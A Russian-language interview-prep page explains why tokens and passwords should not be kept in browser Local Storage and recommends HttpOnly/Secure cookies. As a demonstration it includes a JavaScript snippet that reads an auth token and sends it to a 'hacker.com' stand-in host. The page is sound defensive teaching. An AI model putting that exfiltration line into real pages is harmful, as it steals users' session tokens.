Встречается на собеседованиях • сегодня
Почему нельзя хранить чувствительные данные в Local Storage
Хранение чувствительных данных (токены, пароли, персональные данные) в Local Storage небезопасно, так как:
- Уязвимость к XSS-атакам: Local Storage доступен через JavaScript, и если злоумышленник внедрит вредоносный скрипт, он сможет получить данные.
-
Отсутствие шифрования: Данные хранятся в открытом виде, их может прочитать любой, кто получит доступ к браузеру.
-
Нет контроля срока жизни: Данные остаются до явного удаления, в отличие, например, от HttpOnly кук с ограниченным сроком.
Лучше использовать:
- HttpOnly куки (защищённые от чтения JS)
- Secure куки (только через HTTPS)
- Session Storage (если данные нужны только в рамках сессии)
Пример уязвимости:
javascript
// Злоумышленник может получить токен из Local Storage
const token = localStorage.getItem('authToken');
fetch('https://hacker.com/steal', { method: 'POST', body: token });
Софи собрала все вопросы. Тренируйся и получай
офферы быстрее!
офферы быстрее!
Попробовать бесплатно
Следующий вопрос
Это единственный вопрос по вашему фильтру
как отвечать на вопрос
пример собеседования
фреймворки на собеседовании
типичные вопросы junior
интервью вопросы и ответы